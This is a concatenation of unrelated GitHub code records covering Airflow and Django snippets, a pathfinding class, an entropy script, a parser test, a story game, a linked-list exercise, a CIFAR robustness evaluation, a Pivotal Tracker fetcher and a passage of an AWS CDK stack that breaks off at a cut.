self.result = result\n\n def execute(self, context):\n redshift_hook = PostgresHook(self.redshift_conn_id)\n \n # CHECK THAT THE TABLE IS POPULATED WITH RECORDS RETURNED\n for expected, actual in zip(self.result, self.sql_stmt):\n actual_rendered = redshift_hook.get_records(actual)\n 
if not actual_rendered or not actual_rendered[0]:\n raise ValueError(f\"Data quality check failed. Query returned no result: {actual}\")\n if expected != actual_rendered[0][0]:\n raise ValueError(f\"Data quality check failed. Expected {expected}, but returned result {actual_rendered[0][0]}\")\n self.log.info(f\"Data quality check passed. Returned result {actual_rendered[0][0]} agrees with expected result {expected}\")\n","repo_name":"davidjcampbell89/udacity-data-engineer-nanodegree","sub_path":"Project6-Data-Pipelines/airflow/plugins/operators/data_quality.py","file_name":"data_quality.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15634003874","text":"import sqlite3 as sl\nfrom datetime import datetime as dt\n\nconn = sl.connect(\"test.db\",check_same_thread=False)\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n\n# Create your views here.\n\ndef index(request):\n header = str(request.headers.keys())\n header = header[10:len(header)-2].split(',')\n meter_id = None # renamed from 'id' to avoid shadowing the builtin; stays None if no \"Data\" header is present\n for words in header:\n if words.find(\"Data\") != -1:\n meter_id = int(words.split(\":\")[1].split(\"'\")[1])\n if meter_id is not None:\n current = dt.now()\n print(current)\n # one parameterised UPDATE instead of five separate string-formatted statements\n conn.execute(\"UPDATE KSEB SET YEAR = ?, MONTH = ?, DAY = ?, HOUR = ?, MINUTE = ? WHERE ID = ?\",\n (current.year, current.month, current.day, current.hour, current.minute, meter_id))\n conn.commit()\n\n return HttpResponse(\"Hello, world. You're at the polls index.\")\n\n","repo_name":"abuFahad007/silver-engine","sub_path":"mysite/polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"24106632395","text":"import pygame, png, math, sys\nfrom random import randint\n\n#from src.python_src.constants import *\n#from src.python_src.classes import *\n\nclass Pathfinding():\n\n def __init__(self, mymap):\n self.found = False\n self.blocked = False\n self.size_x = len(mymap[0])\n self.size_y = len(mymap)\n self.around = 2\n self.distance = 0\n self.origin = self.around\n self.mymap = mymap\n self.mymap_original = [row[:] for row in self.mymap]\n self.start = (0,0)\n self.end = (0,0)\n\n def get_map_size_x(self):\n return self.size_x\n\n def get_map_size_y(self):\n return self.size_y\n\n def get_map_path(self):\n self.track()\n return self.mymap\n \n def track(self):\n x = self.end[0]\n y = self.end[1]\n if self.found:\n while self.around > self.origin:\n if y-1 >= 0 and self.mymap[y-1][x] == self.around:\n self.mymap[y-1][x] = 1\n self.around -= 1\n y -= 1\n if y+1 < self.size_y and self.mymap[y+1][x] == self.around:\n self.mymap[y+1][x] = 1\n self.around -= 1\n y += 1\n if x-1 >= 0 and self.mymap[y][x-1] == self.around:\n self.mymap[y][x-1] = 1\n self.around -= 1\n x -= 1\n if x+1 < self.size_x and self.mymap[y][x+1] == self.around:\n self.mymap[y][x+1] = 1\n self.around -= 1\n x += 1\n\n def set_robot_pos(self, pos):\n self.end = pos\n self.reset_mymap()\n \n def set_enemy_pos(self, pos):\n self.start = pos\n self.reset_mymap()\n \n def reset_mymap(self):\n self.mymap = [row[:] for row in self.mymap_original]\n self.mymap[self.start[1]][self.start[0]] = self.origin\n self.mymap[self.end[1]][self.end[0]] = self.origin-1\n \n def findpath(self):\n self.found = False\n self.blocked = False\n self.distance = 0\n self.around = self.origin\n while not self.found and not self.blocked:\n 
self.blocked = True\n for y in range(self.size_y):\n for x in range(self.size_x):\n if self.mymap[y][x] == self.around:\n self.stepup(x, y, self.around)\n self.stepdown(x, y, self.around)\n self.stepleft(x, y, self.around)\n self.stepright(x, y, self.around)\n self.around += 1\n self.around -= 1\n self.distance = self.around -1\n \n def get_distance(self):\n self.findpath()\n return self.distance\n \n def stepup(self, x, y, around):\n if y-1 >= 0:\n if self.mymap[y-1][x] == 0:\n if self.mymap[y+1][x] == -1 or self.mymap[y+2][x] == -1:\n self.mymap[y-1][x] = around + 1\n self.blocked = False\n if self.mymap[y-1][x] == 1:\n self.found = True\n \n def stepdown(self, x, y, around):\n if y+1 < self.size_y and self.mymap[y+1][x] == 0:\n self.mymap[y+1][x] = around + 1\n self.blocked = False\n if y+1 < self.size_y and self.mymap[y+1][x] == 1:\n self.found = True  \n\n def stepleft(self, x, y, around):\n if x-1 >= 0 and self.mymap[y][x-1] == 0:\n self.mymap[y][x-1] = around + 1\n self.blocked = False\n if x-1 >= 0 and self.mymap[y][x-1] == 1:\n self.found = True  \n\n def stepright(self, x, y, around):\n if x+1 < self.size_x and self.mymap[y][x+1] == 0:\n self.mymap[y][x+1] = around + 1\n self.blocked = False\n if x+1 < self.size_x and self.mymap[y][x+1] == 1:\n self.found = True  \n\n def print_mymap(self):\n for y in range(self.size_y):\n print (self.mymap[y])\n print (\"\")\n","repo_name":"gifteam/Project-Super-Retro-World","sub_path":"Super_Retro_World_v1/build/exe.win32-3.6/src/python_src/classes/Pathfinding.py","file_name":"Pathfinding.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"5648524932","text":"import random\nfrom math import log2\n\nsequence = []\ncharCount = 0\nbinCount = [0,0]\n#array2 = [0,1]\n#array3 = [00,01,10,11]\n#array4 = [000,001,010,011,100,101,110,111]\n#array5 = [0000,0100,1000,1100,0001,0101,1001,1101,0010,0110,1010,1110,0011,0111,1011,1111]\nprobabilities = [0,0]\n\nlist1 = ['{:01b}'.format(i) for i in range(2)]\nlist2 = ['{:02b}'.format(i) for i in range(4)]\nlist3 = ['{:03b}'.format(i) for i in range(8)]\nlist4 = ['{:04b}'.format(i) for i in range(16)]\nlist5 = ['{:05b}'.format(i) for i in range(32)]\nlist6 = ['{:06b}'.format(i) for i in range(64)]\nlist7 = ['{:07b}'.format(i) for i in range(128)]\nlist8 = ['{:08b}'.format(i) for i in range(256)]\nlist9 = ['{:09b}'.format(i) for i in range(512)]  # 2**9 = 512 distinct 9-bit strings\n\ndict1 = dict.fromkeys(list1, 0)\ndict2 = dict.fromkeys(list2, 0)\ndict3 = dict.fromkeys(list3, 0)\ndict4 = dict.fromkeys(list4, 0)\ndict5 = dict.fromkeys(list5, 0)\ndict6 = dict.fromkeys(list6, 0)\ndict7 = dict.fromkeys(list7, 0)\ndict8 = dict.fromkeys(list8, 0)\ndict9 = dict.fromkeys(list9, 0)\n\nfor _ in range(100):\n k = random.randint(0, 1) # decide on a k each time the loop runs\n #print(k)\n sequence.append(k)\n charCount += 1\n if k == 0:\n dict1['0'] += 1\n elif k == 1:\n dict1['1'] += 1\n\ndef getEntropy(probabilities):\n entropy = 0\n for n in range(len(probabilities)):\n #print(probabilities[n])\n if probabilities[n] > 0: # 0*log2(0) -> 0 by convention; log2(0) itself would raise\n entropy += (probabilities[n] * log2(probabilities[n]))\n entropy = -entropy\n return entropy\n \nprint(\"The sequence is: \",sequence)\n#print(dict1)\nprobabilities[0] = dict1['0']/charCount\nprobabilities[1] = dict1['1']/charCount\n#print(probabilities)\nentropy = getEntropy(probabilities)\nprint(\"The entropy of H(M,N=1) is\", 
entropy)\n\n\n#https://stackoverflow.com/questions/15450192/fastest-way-to-compute-entropy-in-python\n\n","repo_name":"IleanaAurora/Python","sub_path":"Cryptography/Canceled Class Work/randNumTest OG.py","file_name":"randNumTest OG.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18221528403","text":"from open_words.parse import Parser\n\nimport unittest\n\n\nclass VerbTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.par = Parser()\n\n def test_quaero(self):\n \"\"\"\n expected = {'word': 'quaero',\n 'defs': [{'orth': ['quaero', 'quaerere', 'quaesivi', 'quaesitus'],\n 'senses': ['search for, seek, strive for', 'obtain', 'ask, inquire, demand'],\n 'infls': [{'stem': 'quaer', 'ending': 'o', 'pos': 'verb',\n 'form': {'tense': 'present', 'voice': 'active', 'mood': 'indicative',\n 'person': 1, 'number': 'singular'}}]}]}\n \"\"\"\n result = self.par.parse(\"quaero\")\n # response syntax and basics\n self.assertEqual(len(result['defs']), 1) # there is only one definition\n self.assertTrue(len(result['defs'][0])) # defs does not contain an empty dictionary\n self.assertEqual(len(result['defs'][0]['infls']), 1) # there is only one inflection\n\n # response splitting\n infl = result['defs'][0]['infls'][0]\n self.assertEqual(infl['stem'], 'quaer')\n self.assertEqual(infl['ending'], 'o')\n self.assertEqual(infl['pos'], 'verb')\n\n # response details\n form = infl['form']\n expected_form = {'tense': 'present', 'voice': 'active', 'mood': 'indicative', 'person': 1, 'number': 'singular'}\n self.assertEqual(form, expected_form)\n","repo_name":"a11ce/open_words","sub_path":"open_words/tests/integration/Test_Verbs.py","file_name":"Test_Verbs.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"43"} +{"seq_id":"1994216421","text":"from story_node import StoryNode\nfrom player import Player\n#import ctypes\n#import time\n#lib = ctypes.CDLL('FakeInputWin')\nfrom speech_recog import *\nfrom text_to_speech import *\nfrom nltk.stem.snowball import SnowballStemmer\n\n\"\"\"This class represents a story which is built from StoryNodes\nand a Player. Given a list of nodes, with the first being the starting node\nin the story, it is able to walk between nodes. When a node is visited it\nis added as a string in the dictionary of the player. Additionally, any tokens\nthat are prerequisites for later nodes are added. 
For example, a box office\nnode, when visited, will add a 'ticket' to the completed dictionary in player\"\"\"\n\nstemmer = SnowballStemmer('english')\n\nclass Story(object):\n # set up player and story\n def __init__(self, a_player, the_nodes):\n self.player = a_player\n self.nodes = the_nodes\n # returns child node given by players response, s, if s is a child of the current node\n # otherwise the current node is returned because s is not a valid choice\n def getNextNode(self, current, s):\n #check if user says exactly the node's name\n for child in current.children:\n if s.lower() == child.name.lower():\n return child\n\n #checks if user says node's name in a longer sentence (node's name can be multiple words)\n stems = [] #get root of every word to compare \n for word in s.lower().split():\n stems.append(stemmer.stem(word))\n \n if \"quit\" in s:\n return None\n\n for c in current.children_stems: #for every child of current\n count = 0\n for stem in c: #for every word in current.child's name\n if stem in stems: #if the user said that word\n count += 1 #success, look for next word in name, if applicable\n #otherwise, check next child\n if count == len(c): #if the user said every word in current.child's name\n return current.children[current.children_stems.index(c)]\n return current\n \n def prereqsValid(self, player, newCurrent):\n for prereq in newCurrent.prereqs:\n if not prereq in player.completed.keys() or player.completed[prereq] == False:\n speak(\"You do not have your \" + prereq + \" yet! Choose somewhere else to go.\")\n return False\n return True\n \n # moves the player to the next node in the story based on getNextNode\n def nextNode(self, player):\n\t# sets current working node to the players present position\n current = player.location\n\t\t\n\t# automated greeting for node \n\t# TODO develop better automated 'welcome'\n #speak(\"Welcome to the \" + current.name)\n\t\t\n\t# a node can have multiple activities associated with it\n\t# each activity must be completed before moving to next node\n s = current.activity.doActivity(player)\n\t\n\t\t\n\t# prompts user to choose next node out of options\n #speak(\"You are at the \" + current.name + \". Where would you like to go now?\")\n #self.printChildren(current)\n\n\t#if activity method did not return the next node, then get user's choice\n if s == None:\n s = getInputString()\n\t# check if a valid choice has been made or if getNextNode has returned the current working node\n newCurrent = self.getNextNode(current, s)\n while (not newCurrent == None) and (newCurrent == current or (not self.prereqsValid(player, newCurrent))):\n if newCurrent == current:\n speak(\"Sorry, that confused me. 
Please say one of the following:\")\n for c in current.children:\n speak(c.name)\n s = getInputString()\n newCurrent = self.getNextNode(current, s)\n #once a valid choice is made set current node then return it\n\n return newCurrent\n \n \n def walk(self, player): # function to 'play' the story\n while player.location != None: # while there are still nodes to visit, visit them using nextNode\n player.location = self.nextNode(player)\n\n def printChildren(self, current):\n for index,child in enumerate(current.children):\n speak(child.name)\n\n\n","repo_name":"jacnel/LilyInteractive","sub_path":"story.py","file_name":"story.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"70415363969","text":"from collections import defaultdict\nMOD = 1000000007\nN = int(input())\nA = list(map(int, input().split()))\n\nans = 1\nd = defaultdict(int)\nfor a in A:\n if a == 0:\n ans *= 3 - d[a]\n d[a] += 1\n continue\n ans *= d[a - 1] - d[a]\n ans %= MOD\n d[a] += 1\nprint(ans)\n","repo_name":"d6ms/kyopro","sub_path":"py/others/20191201_sumitrust2019/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"28193791500","text":"# __author__ = ‘pan‘\n# -*-coding:utf-8-*-\n\nimport time\nfrom util.config.yaml.readyaml import ReadYaml\nfrom util.file.fileutil import FileUtil\nfrom src.helper.hepler_waybill import HeplerWaybill\nfrom src.helper.is_have_waybill import ISHaveWaybill\nfrom src.helper.driver_confirm_api import DriverConfirmApi\nfrom src.page.page import Page\nfrom src.page.page_waybill_departure import PageWaybillDeparture\n\n\nclass PagePaymentDeparture(Page):\n '''Departure payment page'''\n\n def get_payment_departure_waybill(self, driver='', driverConfirm='1'):\n '''Get the waybill number shown on the departure payment page'''\n try:\n payment_departure_waybillId, payment_departure_tmsBillCode = ISHaveWaybill().is_have_payment_departure_waybill(\n driver=driver, driverConfirm=driverConfirm)[:2]\n\n if payment_departure_waybillId != None:\n waybillId, tmsBillCode = str(payment_departure_waybillId[0]), str(payment_departure_tmsBillCode[0])\n return waybillId, tmsBillCode\n else:\n waybillId, tmsBillCode = PageWaybillDeparture(self.driver).get_wait_departure_waybill(driver=driver)\n PageWaybillDeparture(self.driver).departure_confirm(tmsBillCode=tmsBillCode)\n if driverConfirm == '1':\n # Driver confirms departure\n DriverConfirmApi().driver_confirm_api(billId=waybillId, totalAmt='1000', preAmt='0.01', oilAmt='0.01',\n destAmt='0.01', lastAmt='0.01', receiverId='')\n return waybillId, tmsBillCode\n except Exception as e:\n self.logger.error('Failed to get the waybill number on the departure payment page: {0}'.format(e))\n return None, None\n finally:\n # Open the freight payment module\n HeplerWaybill().open_menu(self.driver,'xpath->//*[@id=\"menu\"]/div/nav/ul/li[5]/label/a')\n\n def payment_KEKING_TO_comment(self,tmsBillCode='',payMethod=''):\n '''Departure payment page: pay with a method other than wallet balance'''\n try:\n # Open the departure payment page\n HeplerWaybill().open_menu(self.driver, 'xpath->//*[@id=\"menu\"]/div/nav/ul/li[5]/div/ul/li[2]/a/span')\n # Enter the waybill number and run the query\n HeplerWaybill().fuzzy_query(self.driver, 'id->globalCondition', 'id->globalConditionButton', tmsBillCode)\n self.driver.element_is_not_visible('class->loading-bar-background')\n # Select the waybill\n self.driver.click('id->TMS-selectCheckbox-')\n # Click the pay button to open the payment dialog\n self.driver.click('id->TMS-toWayBillPay-')\n self.driver.element_is_not_visible('class->loading-bar-background')\n # Select a payment method other than wallet balance\n self.driver.click('{0}'.format(payMethod))\n # Confirm the payment\n self.driver.click('id->TMS-toPursePay-')\n self.driver.element_is_not_visible('class->loading-bar-background')\n except Exception as e:\n self.logger.error('Departure payment page, paying with a non-balance method: {0}'.format(e))\n return None\n\n def singlePay_KEKING_TO_COMPANY(self,tmsBillCode=''):\n '''Departure payment page: pay a single waybill via merchant loan payment'''\n try:\n self.payment_KEKING_TO_comment(tmsBillCode=tmsBillCode,payMethod='xpath->//*[@id=\"wayBillPay\"]/div/div/div[2]/div/form/div[2]/div[2]/table/tbody/tr[2]/td[2]/span/label')\n except Exception as e:\n self.logger.error('Departure payment page, exception while selecting merchant loan payment: {0}'.format(e))\n return None\n\n def singlePay_KEKING_TO_DRIVER(self,tmsBillCode=''):\n '''Departure payment page: pay a single waybill via driver credit payment'''\n try:\n self.payment_KEKING_TO_comment(tmsBillCode=tmsBillCode,payMethod='xpath->//*[@id=\"wayBillPay\"]/div/div/div[2]/div/form/div[2]/div[2]/table/tbody/tr[2]/td[3]/span/label')\n except Exception as e:\n self.logger.error('Departure payment page, exception while paying a single waybill via driver credit payment: {0}'.format(e))\n return None\n\n def singlePay_OFFLINE(self,tmsBillCode=''):\n '''Departure payment page: pay a single waybill via offline payment'''\n try:\n self.payment_KEKING_TO_comment(tmsBillCode=tmsBillCode,payMethod='xpath->//*[@id=\"wayBillPay\"]/div/div/div[2]/div/form/div[2]/div[2]/table/tbody/tr[2]/td[5]/span/label')\n except Exception as e:\n self.logger.error('Departure payment page, exception while paying a single waybill via offline payment: {0}'.format(e))\n return None\n\n def singlePay_WALLET_TO_DRIVER(self,tmsBillCode=''):\n '''Departure payment page: pay via wallet balance'''\n try:\n # Open the departure payment page\n HeplerWaybill().open_menu(self.driver, 'xpath->//*[@id=\"menu\"]/div/nav/ul/li[5]/div/ul/li[2]/a/span')\n # Enter the waybill number and run the query\n HeplerWaybill().fuzzy_query(self.driver, 'id->globalCondition', 'id->globalConditionButton', tmsBillCode)\n # Select the waybill\n self.driver.click('id->TMS-selectCheckbox-')\n # Click the pay button to open the payment dialog\n self.driver.click('id->TMS-toWayBillPay-')\n self.driver.element_is_not_visible('class->loading-bar-background')\n # Select wallet balance payment\n self.driver.click('xpath->//*[@id=\"wayBillPay\"]/div/div/div[2]/div/form/div[2]/div[2]/table/tbody/tr[2]/td[4]/span/label')\n self.driver.element_is_not_visible('class->loading-bar-background')\n # Confirm the payment\n self.driver.click('id->TMS-toPursePay-')\n self.driver.element_is_not_visible('class->loading-bar-background')\n # Enter the payment password and confirm the payment\n self.config = ReadYaml(FileUtil.getProjectObsPath() + '/config/config.yaml').getValue()\n self.driver.type('id->sendcreate',self.config['payPassword'])\n self.driver.click('id->TMS-lianLianPay-')\n self.driver.element_is_not_visible('class->loading-bar-background')\n except Exception as e:\n self.logger.error('Departure payment page, paying via wallet balance: {0}'.format(e))\n return None\n\n def create_waybill_confirm(self):\n '''Payment record: confirm button'''\n self.driver.click('xpath->//*[@id=\"promptInfo\"]/div/div/div[3]/button')\n self.driver.element_is_not_visible('class->loading-bar-background')\n\n def payment_waybill_success(self):\n '''Payment succeeded'''\n self.driver.element_is_not_visible('class->loading-bar-background')\n return self.driver.get_text('xpath->//*[@id=\"promptInfo\"]/div/div/div[2]/div[1]/div[2]/table/tbody/tr[1]/td[7]')","repo_name":"penny1205/UI_testing","sub_path":"src/page/page_payment_departure.py","file_name":"page_payment_departure.py","file_ext":"py","file_size_in_byte":6776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35064869289","text":"\"\"\"\nYou have two numbers represented by a linked list, where each node contains a single digit. \nThe digits are stored in reverse order, such that the 1's digit is at the head of the list. 
\nWrite a function that adds the two numbers and returns the sum as a linked list.\n\nEXAMPLE\nInput : (7 ->1 -> 6) + (5 -> 9 -> 2). That is 617 + 295\nOutput : 2 -> 1 -> 9. That is 912\n\nFollow up:\nSuppose the digits are stored in forward order. Repeat the above problem.\nEXAMPLE\nInput : (6 -> 1 -> 7) + (2 -> 9 -> 5). That is 617 + 295\nOutput : 9 -> 1 -> 2. That is 912\n\"\"\"\n\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.next = None\n\n\nclass Solution:\n\n def sumList(self, head1, head2):\n\n # Solution for the follow up\n\n head1 = self.reverseList(head1) # reversing the given linkedlist\n head2 = self.reverseList(head2) # reversing the given linkedlist\n\n # summation operation\n ans = Node(0)\n dummy = ans\n carry = 0\n\n while head1 and head2:\n\n total = head1.val + head2.val + carry\n\n val = total % 10 # for binary number total % 2\n carry = total // 10 # for binary number total // 2\n\n ans.next = Node(val)\n\n head1 = head1.next\n head2 = head2.next\n ans = ans.next\n\n while head1:\n total = head1.val + carry\n\n val = total % 10\n carry = total // 10\n\n if not carry:\n head1.val = val # fold the last carry into this node before linking the rest\n ans.next = head1\n break\n\n ans.next = Node(val)\n ans = ans.next # advance, otherwise the next digit would overwrite this one\n head1 = head1.next\n\n while head2:\n total = head2.val + carry\n val = total % 10\n carry = total // 10\n\n if not carry:\n head2.val = val # fold the last carry into this node before linking the rest\n ans.next = head2\n break\n\n ans.next = Node(val)\n ans = ans.next # advance, otherwise the next digit would overwrite this one\n head2 = head2.next\n\n if carry:\n ans.next = Node(carry)\n\n return self.reverseList(dummy.next) # skip the dummy head, otherwise a stray 0 ends up in the result\n\n def reverseList(self, head): # reverse a linkedlist\n prev = None\n\n while head:\n temp = head.next\n head.next = prev\n\n prev = head\n\n head = temp\n\n return prev\n\n\n\"\"\"\nCan you solve the same problem using binary numbers?\n\ninput: (1-> 0 -> 1 -> 0) + (1 -> 1 -> 1 -> 1). That is 1010 + 1111\noutput: 1 -> 1 -> 0 -> 0 -> 1 . That is 11001\n\"\"\"\n","repo_name":"Sen2k9/Algorithm-and-Problem-Solving","sub_path":"CTCI/2.5_sum_lists.py","file_name":"2.5_sum_lists.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"40025156664","text":"\"\"\"\nInfinite evaluation loop going through the checkpoints in the model directory\nas they appear and evaluating them. 
Accuracy and average loss are printed and\nadded as tensorboard summaries.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom datetime import datetime\nimport json\nimport math\nimport os\nimport sys\nimport time\nimport numpy as np\n\nimport tensorflow as tf\n\nimport cifar10_input\nfrom model_cifar import Model\n#from pgd_attack import LinfPGDAttack\nfrom pgd_multiGPU import *\n\n# Global constants\nwith open('config.json') as config_file:\n config = json.load(config_file)\nnum_eval_examples = config['num_eval_examples']\neval_batch_size = config['eval_batch_size']\neval_on_cpu = config['eval_on_cpu']\ndata_path = config['data_path']\n\nmodel_dir = config['model_dir']\n\n# Set upd the data, hyperparameters, and the model\ncifar = cifar10_input.CIFAR10Data(data_path)\n\nmodel = Model(config, mode='eval')\n\nglobal_step = tf.contrib.framework.get_or_create_global_step()\n\n# Setting up the Tensorboard and checkpoint outputs\nif not os.path.exists(model_dir):\n os.makedirs(model_dir)\neval_dir = os.path.join(model_dir, 'eval')\nif not os.path.exists(eval_dir):\n os.makedirs(eval_dir)\n\nalready_seen_state = False\n\nsaver = tf.train.Saver()\nsummary_writer = tf.summary.FileWriter(eval_dir)\n\ncheck_dict = {\n'nat_img': [],\n'adv_img': [],\n'nat_pred': [],\n'adv_pred': [],\n'nat_preds': [],\n'adv_preds': [],\n'label': [],\n'ckeck_idx': []\n}\n\n# A function for evaluating a single checkpoint\ndef evaluate_checkpoint(filename):\n FLAGS = tf.app.flags.FLAGS\n tfconfig = tf.ConfigProto(\n allow_soft_placement=True,\n log_device_placement=True,\n )\n tfconfig.gpu_options.allow_growth = True\n with tf.Session() as sess:#config=tfconfig\n\n # Restore the checkpoint\n saver.restore(sess, filename)\n\n # Iterate over the samples batch-by-batch\n num_batches = int(math.ceil(num_eval_examples / eval_batch_size))\n total_xent_nat = 0.\n total_xent_adv = 0.\n total_corr_nat = 0\n total_corr_adv = 0\n\n for ibatch in range(num_batches):\n bstart = ibatch * eval_batch_size\n bend = min(bstart + eval_batch_size, num_eval_examples)\n\n x_batch = cifar.eval_data.xs[bstart:bend, :]\n x_batch = np.asarray(x_batch, 'float32') / 255.\n y_batch = cifar.eval_data.ys[bstart:bend]\n\n dict_nat = {model.x_input: x_batch,\n model.y_input: y_batch}\n\n #x_batch_adv = attack.perturb(x_batch, y_batch, sess)\n x_batch_adv = get_PGD(sess, model.adv_grad, dict_nat, model.x_input, epsilon=8. 
/ 255, a=0.2 / 255, k=70)\n\n dict_adv = {model.x_input: x_batch_adv,\n model.y_input: y_batch}\n\n nat_prediction, nat_voted_pred, acc_i, cur_xent_nat = sess.run(\n [model.prediction, model.voted_pred, model.accuracy,model.mean_xent],\n feed_dict = dict_nat)\n cur_corr_nat = acc_i*config['eval_batch_size']\n adv_prediction, adv_voted_pred, acc_i, cur_xent_adv = sess.run(\n [model.prediction, model.voted_pred, model.accuracy,model.mean_xent],\n feed_dict = dict_adv)\n cur_corr_adv = acc_i*config['eval_batch_size']\n print(eval_batch_size)\n print(\"Correctly classified natural examples: {}\".format(cur_corr_nat))\n print(\"Correctly classified adversarial examples: {}\".format(cur_corr_adv))\n total_xent_nat += cur_xent_nat\n total_xent_adv += cur_xent_adv\n total_corr_nat += cur_corr_nat\n total_corr_adv += cur_corr_adv\n\n check_idx = ~ np.equal(nat_voted_pred, y_batch) * np.equal(adv_voted_pred, y_batch)\n check_dict['nat_img'] += [x_batch[check_idx]]\n check_dict['adv_img'] += [x_batch_adv[check_idx]]\n check_dict['nat_pred'] += [nat_voted_pred[check_idx]]\n check_dict['adv_pred'] += [adv_voted_pred[check_idx]]\n check_dict['nat_preds'] += [nat_prediction[check_idx]]\n check_dict['adv_preds'] += [adv_prediction[check_idx]]\n check_dict['label'] += [y_batch[check_idx]]\n check_dict['ckeck_idx'] += [check_idx]\n\n check_dict['nat_img'] = np.concatenate(check_dict['nat_img'], 0)\n check_dict['adv_img'] = np.concatenate(check_dict['adv_img'], 0)\n check_dict['nat_pred'] = np.concatenate(check_dict['nat_pred'], 0)\n check_dict['adv_pred'] = np.concatenate(check_dict['adv_pred'], 0)\n check_dict['nat_preds'] = np.concatenate(check_dict['nat_preds'], 0)\n check_dict['adv_preds'] = np.concatenate(check_dict['adv_preds'], 0)\n check_dict['label'] = np.concatenate(check_dict['label'], 0)\n check_dict['ckeck_idx'] = np.concatenate(check_dict['ckeck_idx'], 0)\n\n if 1:\n import matplotlib.pyplot as plt\n jj = 20\n plt.figure(figsize=(8.8, 2))\n for idx in range(10):\n plt.subplot(2, 10, idx + 1)\n plt.imshow(check_dict['nat_img'][jj + idx])\n plt.title('{}'.format(check_dict['nat_preds'][jj + idx]))\n plt.axis('off')\n plt.subplot(2, 10, idx + 1 + 10)\n plt.imshow(check_dict['adv_img'][jj + idx])\n plt.title('{}'.format(check_dict['adv_preds'][jj + idx]))\n plt.axis('off')\n\n avg_xent_nat = total_xent_nat / num_eval_examples\n avg_xent_adv = total_xent_adv / num_eval_examples\n acc_nat = total_corr_nat / num_eval_examples\n acc_adv = total_corr_adv / num_eval_examples\n\n summary = tf.Summary(value=[\n tf.Summary.Value(tag='xent adv eval', simple_value= avg_xent_adv),\n tf.Summary.Value(tag='xent adv', simple_value= avg_xent_adv),\n tf.Summary.Value(tag='xent nat', simple_value= avg_xent_nat),\n tf.Summary.Value(tag='accuracy adv eval', simple_value= acc_adv),\n tf.Summary.Value(tag='accuracy adv', simple_value= acc_adv),\n tf.Summary.Value(tag='accuracy nat', simple_value= acc_nat)])\n summary_writer.add_summary(summary, global_step.eval(sess))\n\n print('natural: {:.2f}%'.format(100 * acc_nat))\n print('adversarial: {:.2f}%'.format(100 * acc_adv))\n print('avg nat loss: {:.4f}'.format(avg_xent_nat))\n print('avg adv loss: {:.4f}'.format(avg_xent_adv))\n\nif __name__ == '__main__':\n 
evaluate_checkpoint('/home/hope-yao/Documents/adversarial_defense/cifar/ckpt/crop_4_20_adv/half_half/lr_config1_adv/checkpoint-25001')","repo_name":"DesignInformaticsLab/adversarial_defense","sub_path":"cifar/script/check_cifar.py","file_name":"check_cifar.py","file_ext":"py","file_size_in_byte":6392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"29359610630","text":"from __future__ import print_function\nimport requests\nimport os\nimport sys\nimport pandas as pd\n\nAPI_KEY = os.getenv('TRACKER_API_KEY')\nPROJECT_ID = sys.argv[1]\nAPI = \"https://www.pivotaltracker.com/services/v5/projects/{project_id}/iterations\".format(project_id=PROJECT_ID)\n\ndef get_chunk(offset):\n r = requests.get(API,\n headers={'X-TrackerToken' : API_KEY},\n params=dict(\n limit = 100,\n offset = offset,\n fields = 'number,length,team_strength,velocity,analytics,points,effective_points,accepted,story_ids'\n ))\n return r.json()\n\ndef fetch_all():\n results = []\n i = 0\n\n while True:\n print('Grabbing chunk %d' % i)\n chunk = get_chunk(i)\n if i == 0:\n print(chunk)\n\n if len(chunk) == 0:\n break\n results.extend(chunk)\n\n i+=len(chunk)\n\n df = pd.DataFrame(results)\n df.to_csv('tracker-{}-iterations.csv'.format(PROJECT_ID), index=False, encoding='utf-8')\n\nif __name__ == '__main__':\n fetch_all()\n","repo_name":"samzhang111/velocity-prediction","sub_path":"grab_iterations.py","file_name":"grab_iterations.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"8162125372","text":"class AliceGameEasy():\n def findMinimumValue(self, x, y):\n total = x + y\n turns = 0\n while turns*(turns+1)//2 < total: turns += 1\n \n if turns*(turns+1)//2 > total: return -1\n \n high = 0\n low = 0\n\n for i in range(turns+1):\n if low <= x <= high: return i\n low += i + 1\n high += turns - i\n\n return -1","repo_name":"ygretharekar/srm","sub_path":"SRM 639/alice_game_easy.py","file_name":"alice_game_easy.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20259891963","text":"n=int(input())\na=list(map(int,input().split()))\nli=list(input())\n\nfor i in range(len(a)):\n if li[i]==\"1\":\n for j in range(i+1,len(a)):\n if j None:\n super().__init__(scope, construct_id, **kwargs)\n\n networking = NetworkStack(self, \"NetworkStack\", )\n\n storage = StorageStack(self, \"StorageStack\",\n jenkins_home=jenkins_home,\n vpc=networking.vpc,\n )\n\n ServiceStack(self, \"ServiceStack\",\n jenkins_home=jenkins_home,\n app_name=app_name,\n 